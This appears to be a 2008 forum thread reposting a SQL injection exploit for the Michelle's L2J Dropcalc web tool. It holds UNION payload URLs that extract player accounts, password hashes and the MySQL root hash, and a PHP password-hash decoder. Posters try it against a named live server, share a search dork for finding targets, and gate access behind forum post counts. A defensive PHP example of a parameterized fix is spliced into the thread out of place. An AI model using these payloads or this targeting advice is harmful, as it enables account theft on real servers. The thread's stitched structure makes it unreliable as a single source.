caesar4l2 Posted October 30, 2008

#==============================================================================================
# Title: Michelle's L2J Dropcalc
# Version: <= v4
# Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm
#
# Discovered By: Codebreak (codebreak1984@gmail.com | www.codebreak.tk)
#
#==============================================================================================
# SQL Injection: (*** Must be logged in, using your own username and Token ***)
#
# http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=[sql]
#
# Example:
#
# Obtain a player username:
# http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
#
# Obtain a password for that username (*** encrypted):
# * only valid if loginserver and gameserver are on the same machine
# http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[USERNAME]"
#
#
# Bonus:
#
# Obtain MYSQL Password (encrypted):
# * only valid if the script is executed with a root account.
# http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"
#
# *** L2J Encrypted Password can be decoded into a SHA1 hash. I've made a script to do that and it's included in this file
#
###############################################################################################

<--------- Beginning of PHP Script --------->
<style type="text/css">
<!--
.style3 {font-size: 24px}
.style1 {color: #CC0000}
-->
</style>
<?php
echo("<title>L2J Pass Decoding - POC</title>");
// The stored L2J password is the base64 encoding of a raw SHA1 digest;
// decoding it and dumping the bytes as hex gives the usual 40-character hash.
$pass = isset($_POST['decode']) ? $_POST['decode'] : '';
$unpass3 = base64_decode($pass);
$array = unpack("H*", $unpass3);   // returns array(1 => '<hex string>')
$unpass2 = $array[1];
echo("<span class=style1><b><u>Decoding Password</u></b></span>");
// The submitted value is reflected into the page, so escape it.
echo("<br><b>Base 64:</b> " . htmlspecialchars($pass) . "<br>");
echo("<b>Unpacked:</b> $unpass3<br>");
echo("<br><b>SHA1:</b> $unpass2<br>");
?>
<form name="form1" method="post" action="">
<div align="center">
<input type="text" name="decode">
<input type="submit" value="Decode">
</div>
</form>
<br><br><br><center><i>Created by Codebreak</i></center>
<------------- End of Script ------------->

# milw0rm.com [2007-01-31]

C/p from milw0rm. Notice that I've not made it work; if someone makes it work, pls share the how-to. I've tried on www.cfl2.eu but I think I'm missing something.. dunno what. Btw, the guide is in the code tag; however, I report it here:

This exploit can be used by web browser only for servers which support and have Michelle's L2J Dropcalc running:

# SQL Injection: (*** Must be logged in, using your own username and Token ***)
#
# http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=
#
# Example:
#
# Obtain a player username:
# http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
#
# Obtain a password for that username (*** encrypted):
# * only valid if loginserver and gameserver are on the same machine
# http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[USERNAME]"
#
#
# Bonus:
#
# Obtain MYSQL Password (encrypted):
# * only valid if the script is executed with a root account.
# http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"

As you can see it's pretty easy to do, I just don't get it to work; hope someone can help asap. I've decreased the post count to 500 :P

EDIT: decreased again, pls someone try this..

caesar
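The weakness the advisory relies on is that the `itemid` value is pasted straight into the SQL text, so a `UNION` with the same column count as the item query appends rows from whatever other table the database user can read. The PHP below is an added example, not code from the advisory, from this thread, or from Michelle's L2J Dropcalc: it rebuilds that lookup against an in-memory SQLite database and shows the concatenated query beside a version that checks the value is a plain integer and binds it as a parameter. The table and column names (`items`, `characters`, `account_name`) are assumptions borrowed from the advisory's queries, and the rows are constructed.

```php
<?php
// Added example: a reconstruction of an i-search.php style item lookup, vulnerable
// and hardened. Schema and data are constructed; nothing here is the real Dropcalc code.

function buildDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Seven columns, so a seven-value UNION lines up exactly as in the advisory.
    $db->exec('CREATE TABLE items (id INTEGER, name TEXT, type TEXT, weight INTEGER, price INTEGER, grade TEXT, note TEXT)');
    $db->exec("INSERT INTO items VALUES (57, 'Adena', 'etc', 0, 1, 'none', 'currency')");
    // Assumed table: the advisory selects account_name from characters by char_name.
    $db->exec('CREATE TABLE characters (char_name TEXT, account_name TEXT)');
    $db->exec("INSERT INTO characters VALUES ('SamplePlayer', 'sample_account')");
    return $db;
}

// Vulnerable pattern: the raw request value becomes part of the SQL text.
function lookupItemVulnerable(PDO $db, string $itemid): array {
    $sql = "SELECT id, name, type, weight, price, grade, note FROM items WHERE id = $itemid";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened pattern: accept only a short run of digits, then bind it as a parameter.
// Validation alone is not the defence; the bound parameter is what keeps the value
// out of the SQL parser. The digit check just gives a clean error for junk input.
function lookupItemSafe(PDO $db, string $itemid): array {
    if (!preg_match('/^\d{1,10}$/', $itemid)) {
        throw new InvalidArgumentException('itemid must be a positive integer');
    }
    $stmt = $db->prepare('SELECT id, name, type, weight, price, grade, note FROM items WHERE id = ?');
    $stmt->execute([(int) $itemid]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

$db = buildDb();
// The advisory's payload shape, pointed at the constructed row.
$payload = "-1 UNION SELECT null,account_name,null,null,null,null,null FROM characters WHERE char_name = 'SamplePlayer'";

// Concatenated query: the appended SELECT's row comes back in the item result set.
print_r(lookupItemVulnerable($db, $payload));   // one row with 'sample_account' in column 2

// Bound parameter: the same input is rejected before any SQL runs.
try {
    lookupItemSafe($db, $payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
print_r(lookupItemSafe($db, '57'));             // only the Adena row
```

Run it with `php` and the `pdo_sqlite` extension enabled. Two things follow from the advisory itself: the "Bonus" query only works because the page's database user can read `mysql.user`, so the same script connecting as a user granted `SELECT` on the drop tables alone would expose neither `accounts` nor `mysql.user` even where the injection still existed; and `langval=lang-eng.php` deserves the same scrutiny as `itemid`, since a file name taken from the request is the other classic way a PHP page of this era goes wrong.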
Frank Posted October 30, 2008

Well, it would be useful if you explained to us how to use it? .. Also 1000 posts are too many...
GrisoM Posted October 30, 2008

omg 1000 posts ... n/c xD Keep spamming n/c, u will see ;)

XxRxX, u know how SQL injection works, no? If u don't have a bad memory, there was an explanation somewhere on the forum.

@caesar4l2 anyway, give us 1 mini guide on how to use it ;P If this even works on 1 server I think u could be rewarded.
caesar4l2 (Author) Posted October 30, 2008

> Well, it would be useful if you explained to us how to use it? .. Also 1000 posts are too many...

The guide is in the Code tag... however, I'll write it, give me a sec lol
caesar4l2 (Author) Posted October 30, 2008

EDIT: decreased the posts needed again, now to 50, pls someone try this..
bonesaw Posted October 30, 2008

That's ancient. Just check the release date: 2007-01-31. Plus, it's for very specific L2J servers with a web server that will allow SQL injection. Too specific an exploit... don't think it's gonna work anywhere.

For a successful SQL injection, you must craft your own queries; that c/p stuff won't work unless it details which application this is used for and what version... very, very specific.
caesar4l2 (Author) Posted October 30, 2008

> That's ancient. Just check the release date: 2007-01-31. Plus, it's for very specific L2J servers with a web server that will allow SQL injection. Too specific an exploit... don't think it's gonna work anywhere.
>
> For a successful SQL injection, you must craft your own queries; that c/p stuff won't work unless it details which application this is used for and what version... very, very specific.

I think that if the server you play on is not too customized and the GMs are a little bit "stupid", the trick is easy to do. For example, the server on which I tried is using l2jfree, so in place of "name" I must put "char_name", as shown in the characters.sql table. And yes, it's old, but Michelle's L2J Dropcalc is still at the same version (4, at least on the server I mentioned in the 1st post). So that's it, no one wanna try? XD
caesar4l2 (Author) Posted October 30, 2008

You can't even read the post, get lost :|
bonesaw Posted October 30, 2008

Well.. if you google for "inurl:i-search.php dropcalc" you'll find a few servers using it... ;) Not gonna try it, I don't like L2J servers anyway... but a few servers still use it, maybe it'll still work..
GrisoM Posted October 30, 2008

> Well.. if you google for "inurl:i-search.php dropcalc" you'll find a few servers using it... ;) Not gonna try it, I don't like L2J servers anyway... but a few servers still use it, maybe it'll still work..

Results 1 - 7 of 7 xD Well, if u say this is useless.. m.. ok then, if u find a server just tell us xD
caesar4l2 (Author) Posted October 30, 2008

Almost all chronicles; the server I'm trying on is Gracia and the version of the dropcalc is still v4, so compatible with this milw0rm --> however, I'm not that experienced with SQL injection. I've tried this link (injection):

http://dropcalc.cfl2.eu/i-search.php?username=[myuser]&token=[mytoken]&langval=0&server_id=1&skin_id=0&itemid=-1%20UNION%20select%20accout_name%20from%20characters%20where%20char_name%20=%20"juda"

Still nothing, the page has been loading for like an hour lol (the %20 are spaces; Internet Explorer 7 writes them like that lol)